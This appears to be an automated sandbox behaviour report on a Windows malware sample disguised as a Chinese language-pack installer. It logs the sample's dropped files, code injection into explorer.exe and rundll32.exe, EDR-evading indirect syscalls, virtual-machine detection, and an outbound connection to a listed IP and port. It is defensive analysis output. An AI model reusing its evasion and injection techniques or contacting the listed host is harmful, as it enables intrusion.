Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Memory allocated: 21A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Memory allocated: 23C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Memory allocated: 43C0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Window / User API: threadDelayed 9220	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Window / User API: threadDelayed 602	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 6630	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Window / User API: threadDelayed 6123

Source: C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe

Dropped PE file which has not been started: C:\Users\user\4AAA4BEA-4B49-4018-AEDB-86BCC9AEB23A\blackdll.dll

Jump to dropped file

Source: C:\Windows\explorer.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_13-17386

Source: C:\Windows\explorer.exe

API coverage: 8.7 %

Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe TID: 7172	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe TID: 7172	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7872	Thread sleep count: 6630 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7872	Thread sleep time: -66300s >= -30000s	Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 8120	Thread sleep count: 6123 > 30
Source: C:\Windows\System32\rundll32.exe TID: 8120	Thread sleep time: -61230s >= -30000s

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\System32\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\System32\rundll32.exe	Last function: Thread delayed

Source: C:\Windows\System32\rundll32.exe

File Volume queried: C:\ FullSizeInformation

Source: C:\Windows\explorer.exe	Code function: 12_2_07B67408 FindFirstFileExW,	12_2_07B67408
Source: C:\Windows\explorer.exe	Code function: 12_2_0ABAB750 FindFirstFileExW,	12_2_0ABAB750
Source: C:\Windows\explorer.exe	Code function: 13_2_0220F710 CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,CreateFileW,WriteFile,FindFirstFileW,_invalid_parameter_noinfo_noreturn,	13_2_0220F710
Source: C:\Users\user\4AAA4BEA-4B49-4018-AEDB-86BCC9AEB23A\kitty.exe	Code function: 14_2_00007FF8DC5DB16D FindFirstFileExW,	14_2_00007FF8DC5DB16D
Source: C:\Users\user\4AAA4BEA-4B49-4018-AEDB-86BCC9AEB23A\kitty.exe	Code function: 14_2_00007FF8DC5DB18D FindFirstFileExW,	14_2_00007FF8DC5DB18D
Source: C:\Users\user\4AAA4BEA-4B49-4018-AEDB-86BCC9AEB23A\kitty.exe	Code function: 14_2_00007FF8DC5DAED8 FindFirstFileExW,	14_2_00007FF8DC5DAED8

Source: C:\Windows\explorer.exe

13_2_02206300

Source: C:\Windows\explorer.exe

13_2_02206300

Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Thread delayed: delay time: 100000			Jump to behavior

Source: explorer.exe, 0000000C.00000003.2073082825.0000000007B10000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMTools_CompareConfig
Source: explorer.exe, 0000000C.00000003.2073082825.0000000007B10000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMTools_AddConfig
Source: explorer.exe, 0000000C.00000003.2073082825.0000000007B10000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMTools_VmxLogThrottled
Source: explorer.exe, 0000000C.00000002.3140182405.00000000070CF000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000n
Source: explorer.exe, 0000000C.00000003.2073082825.0000000007B10000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMTools_GetTimeAsString
Source: explorer.exe, 0000000C.00000003.2073082825.0000000007B10000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMTools_ConfigGetInteger
Source: explorer.exe, 0000000C.00000003.2073082825.0000000007B10000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMTools_WriteConfig
Source: explorer.exe, 0000000C.00000000.1923761492.000000000934A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3142832306.000000000934A000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.3134744008.000001A3544B8000.00000004.00000020.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000013.00000003.2323150833.00000187C7FDA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 0000000C.00000000.1923761492.00000000091E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3142832306.00000000091E5000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBn
Source: explorer.exe, 0000000C.00000003.2073082825.0000000007B10000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMTools_ConfigGetString
Source: Microsoft_Xtools.exe, 00000009.00000003.1781943317.000002A39D4D8000.00000004.00000020.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000003.1775252350.000002A39D4DF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Insufficient privileges. Only administrators or users that are members of the Hyper-V Administrators user group are permitted to access virtual machines or containers. To add yourself to the Hyper-V Administrators user group, please see https://aka.ms/hcsadmin for more information.
Source: explorer.exe, 0000000C.00000003.2073082825.0000000007B10000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMTools_VmxLog
Source: explorer.exe, 0000000C.00000003.2073082825.0000000007B10000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMTools_CreateTimer
Source: explorer.exe, 0000000C.00000003.2073082825.0000000007B10000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMTools_SetupVmxGuestLog
Source: explorer.exe, 0000000C.00000003.2073082825.0000000007B10000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMTools_TeardownVmxGuestLog
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2311279998.0000000000724000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.3132813663.00000000007B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.3134744008.000001A3544B8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: explorer.exe, 0000000C.00000003.2073082825.0000000007B10000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMTools_ConfigGetBoolean
Source: Microsoft_Xtools.exe, 00000013.00000003.2323150833.00000187C81D6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: explorer.exe, 0000000C.00000003.2073082825.0000000007B10000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMTools_ConfigLogToStdio
Source: explorer.exe, 0000000C.00000003.2073082825.0000000007B10000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMTools_SuspendLogIO
Source: explorer.exe, 0000000C.00000003.2073082825.0000000007B10000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMTools_BindTextDomain
Source: explorer.exe, 0000000C.00000003.2073082825.0000000007B10000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMTools_NewHandleSource
Source: explorer.exe, 0000000C.00000003.2073082825.0000000007B10000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMTools_Log
Source: explorer.exe, 0000000C.00000003.2073082825.0000000007B10000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMTools_ConfigLogging
Source: Microsoft_Xtools.exe, 00000009.00000003.1785992212.000002A39D4D3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000<
Source: Microsoft_Xtools.exe, 00000013.00000003.2323150833.00000187C7FDA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: NXTVMWare
Source: Microsoft_Xtools.exe, 00000009.00000003.1785992212.000002A39D5B8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: r&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: Microsoft_Xtools.exe, 00000013.00000003.2309579287.00000187C7E31000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: DisableGuestVmNetworkConnectivity
Source: explorer.exe, 0000000C.00000003.2073082825.0000000007B10000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMTools_ChangeLogFilePath
Source: explorer.exe, 0000000C.00000003.2073082825.0000000007B10000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMTools_WrapArray
Source: explorer.exe, 0000000C.00000003.2073082825.0000000007B10000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMTools_LoadConfig
Source: explorer.exe, 0000000C.00000003.2073082825.0000000007B10000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMTools_AttachConsole
Source: explorer.exe, 0000000C.00000000.1923761492.0000000009315000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3142832306.0000000009315000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW\MP
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2311279998.0000000000724000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} O
Source: Microsoft_Xtools.exe, 00000013.00000003.2309579287.00000187C7E31000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: EnableGuestVmNetworkConnectivity
Source: explorer.exe, 0000000C.00000003.2073082825.0000000007B10000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: W32Util_GetVmwareCommonAppDataFilePath
Source: explorer.exe, 0000000C.00000003.2073082825.0000000007B10000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMTools_UseVmxGuestLog
Source: explorer.exe, 0000000C.00000003.2073082825.0000000007B10000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMTools_GetUtf16String
Source: explorer.exe, 0000000C.00000003.2073082825.0000000007B10000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMTools_GetString
Source: Microsoft_Xtools.exe, 00000013.00000003.2323150833.00000187C8104000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000l
Source: Microsoft_Xtools.exe, 00000013.00000003.2310109701.00000187C7E61000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 0000000C.00000003.2073082825.0000000007B10000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMTools_ResumeLogIO
Source: Microsoft_Xtools.exe, 00000013.00000003.2323150833.00000187C8104000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: Microsoft_Xtools.exe, 00000013.00000003.2310109701.00000187C7E61000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\4AAA4BEA-4B49-4018-AEDB-86BCC9AEB23A\kitty.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\4AAA4BEA-4B49-4018-AEDB-86BCC9AEB23A\kitty.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\explorer.exe

Code function: 12_2_07B56434 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

12_2_07B56434

Source: C:\Windows\explorer.exe

Code function: 12_2_07B68794 GetProcessHeap,

12_2_07B68794

Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\explorer.exe	Code function: 12_2_07B56434 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_07B56434
Source: C:\Windows\explorer.exe	Code function: 12_2_07B5B1BC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_07B5B1BC
Source: C:\Windows\explorer.exe	Code function: 12_2_0AB9E3C4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_0AB9E3C4
Source: C:\Windows\explorer.exe	Code function: 12_2_0AB99550 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_0AB99550
Source: C:\Users\user\4AAA4BEA-4B49-4018-AEDB-86BCC9AEB23A\kitty.exe	Code function: 14_2_00007FF8DC5D39D4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_00007FF8DC5D39D4
Source: C:\Users\user\4AAA4BEA-4B49-4018-AEDB-86BCC9AEB23A\kitty.exe	Code function: 14_2_00007FF8DC5D8A00 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_00007FF8DC5D8A00
Source: C:\Users\user\4AAA4BEA-4B49-4018-AEDB-86BCC9AEB23A\kitty.exe	Code function: 14_2_00007FF8DC5D3314 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	14_2_00007FF8DC5D3314

Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\rundll32.exe

Network Connect: 206.238.115.224 4433

Allocates memory in foreign processes

Source: C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe	Memory allocated: C:\Windows\explorer.exe base: 8390000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe	Memory allocated: C:\Windows\explorer.exe base: 83D0000 protect: page read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\rundll32.exe base: 1A3542C0000 protect: page read and write	Jump to behavior
Source: C:\Users\user\4AAA4BEA-4B49-4018-AEDB-86BCC9AEB23A\kitty.exe	Memory allocated: C:\Windows\explorer.exe base: 7AF0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\4AAA4BEA-4B49-4018-AEDB-86BCC9AEB23A\kitty.exe	Memory allocated: C:\Windows\explorer.exe base: B10000 protect: page read and write	Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Windows\explorer.exe

Code function: 12_2_07B52270 CreateProcessA,VirtualAllocEx,WriteProcessMemory,VirtualFreeEx,VirtualProtectEx,GetThreadContext,SetThreadContext,ResumeThread,

12_2_07B52270

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\4AAA4BEA-4B49-4018-AEDB-86BCC9AEB23A\kitty.exe	NtUnmapViewOfSection: Indirect: 0x2ED9EF8	Jump to behavior
Source: C:\Users\user\4AAA4BEA-4B49-4018-AEDB-86BCC9AEB23A\kitty.exe	NtUnmapViewOfSection: Indirect: 0x2ED9C2D	Jump to behavior
Source: C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe	NtUnmapViewOfSection: Indirect: 0x2A39D54BF0C	Jump to behavior
Source: C:\Users\user\4AAA4BEA-4B49-4018-AEDB-86BCC9AEB23A\kitty.exe	NtMapViewOfSection: Indirect: 0x2ED975C	Jump to behavior
Source: C:\Users\user\4AAA4BEA-4B49-4018-AEDB-86BCC9AEB23A\kitty.exe	NtMapViewOfSection: Indirect: 0x2ED9C99	Jump to behavior
Source: C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe	NtMapViewOfSection: Indirect: 0x2A39D54BA3B	Jump to behavior
Source: C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe	NtMapViewOfSection: Indirect: 0x2A39D54BF78	Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe	Memory written: PID: 496 base: 8390000 value: E9	Jump to behavior
Source: C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe	Memory written: PID: 496 base: 83D0000 value: 00	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 7812 base: 3D0000 value: 56	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 7812 base: 600000 value: E8	Jump to behavior
Source: C:\Users\user\4AAA4BEA-4B49-4018-AEDB-86BCC9AEB23A\kitty.exe	Memory written: PID: 496 base: 7AF0000 value: E9	Jump to behavior
Source: C:\Users\user\4AAA4BEA-4B49-4018-AEDB-86BCC9AEB23A\kitty.exe	Memory written: PID: 496 base: B10000 value: 00	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\explorer.exe	Thread register set: target process: 7812			Jump to behavior
Source: C:\Windows\explorer.exe	Thread register set: target process: 7924			Jump to behavior

Sets debug register (to hijack the execution of another thread)

Source: C:\Windows\explorer.exe

Thread register set: 7812 C0DA7D0

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe	Memory written: C:\Windows\explorer.exe base: 8390000	Jump to behavior
Source: C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe	Memory written: C:\Windows\explorer.exe base: 83D0000	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\rundll32.exe base: 1A3542C0000	Jump to behavior
Source: C:\Users\user\4AAA4BEA-4B49-4018-AEDB-86BCC9AEB23A\kitty.exe	Memory written: C:\Windows\explorer.exe base: 7AF0000	Jump to behavior
Source: C:\Users\user\4AAA4BEA-4B49-4018-AEDB-86BCC9AEB23A\kitty.exe	Memory written: C:\Windows\explorer.exe base: B10000	Jump to behavior

Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe

Process created: C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe "C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe"

Jump to behavior

Source: explorer.exe, 0000000D.00000002.3132813663.0000000000837000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 0 minProgram Manager
Source: explorer.exe, 0000000C.00000000.1919727146.0000000000949000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3133940858.0000000000949000.00000004.00000020.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000013.00000003.2310109701.00000187C7E47000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Progmanh
Source: explorer.exe, 0000000C.00000000.1923761492.00000000094C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3076011751.00000000094C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1921761066.0000000004510000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000C.00000002.3137120282.00000000010F1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.1920206986.00000000010F1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000000C.00000002.3137120282.00000000010F1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.1920206986.00000000010F1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program ManagerW
Source: explorer.exe, 0000000C.00000002.3137120282.00000000010F1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.1920206986.00000000010F1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: Microsoft_Xtools.exe, 00000009.00000003.1777690969.000002A39D4D3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: onecoreuap\internal\shell\inc\private\idlrooted.h;folderShell_TrayWndRunAsopenSoftware\Microsoft\Tracking\TimeOut::{9db1186e-40df-11d1-aa8c-00c04fb67863}:undeleteTarget;programMSILinkRunAsSoftware\Classes\MIME\Database\Content Type\%sNetLinkTimeout
Source: Microsoft_Xtools.exe, 00000009.00000003.1788871003.000002A39D6BC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerz

Source: C:\Windows\explorer.exe

Code function: 12_2_07B6E1B0 cpuid

12_2_07B6E1B0

Source: C:\Windows\explorer.exe	Code function: GetLocaleInfoW,	12_2_07B6AF30
Source: C:\Windows\explorer.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	12_2_07B6AE80
Source: C:\Windows\explorer.exe	Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,	12_2_07B6A61C
Source: C:\Windows\explorer.exe	Code function: EnumSystemLocalesW,	12_2_07B61E5C
Source: C:\Windows\explorer.exe	Code function: GetLocaleInfoW,	12_2_07B6AD28
Source: C:\Windows\explorer.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	12_2_07B6AAE0
Source: C:\Windows\explorer.exe	Code function: EnumSystemLocalesW,	12_2_07B6AA48
Source: C:\Windows\explorer.exe	Code function: GetLocaleInfoW,	12_2_07B621F0
Source: C:\Windows\explorer.exe	Code function: EnumSystemLocalesW,	12_2_07B6A978
Source: C:\Windows\explorer.exe	Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	12_2_07B6B064
Source: C:\Windows\explorer.exe	Code function: GetLocaleInfoW,	12_2_0ABAF364
Source: C:\Windows\explorer.exe	Code function: GetLocaleInfoW,	12_2_0ABA6880
Source: C:\Windows\explorer.exe	Code function: EnumSystemLocalesW,	12_2_0ABAF084
Source: C:\Windows\explorer.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	12_2_0ABAF11C
Source: C:\Windows\explorer.exe	Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	12_2_0ABAF6A0
Source: C:\Windows\explorer.exe	Code function: EnumSystemLocalesW,	12_2_0ABAEFB4
Source: C:\Windows\explorer.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	12_2_0ABAF4BC
Source: C:\Windows\explorer.exe	Code function: EnumSystemLocalesW,	12_2_0ABA64EC
Source: C:\Windows\explorer.exe	Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,	12_2_0ABAEC58
Source: C:\Windows\explorer.exe	Code function: GetLocaleInfoW,	12_2_0ABAF56C
Source: C:\Windows\explorer.exe	Code function: gethostname,gethostbyname,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,GetSystemInfo,GetDriveTypeW,GetDiskFreeSpaceExW,GlobalMemoryStatusEx,GetNativeSystemInfo,K32GetProcessImageFileNameW,GetLogicalDriveStringsW,CoInitializeEx,CoCreateInstance,RegOpenKeyExW,GetLocaleInfoW,GetCurrentHwProfileW,RegOpenKeyExW,RegDeleteValueW,RegCreateKeyW,RegSetValueExW,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,	13_2_02206300

Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Queries volume information: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe VolumeInformation	Jump to behavior
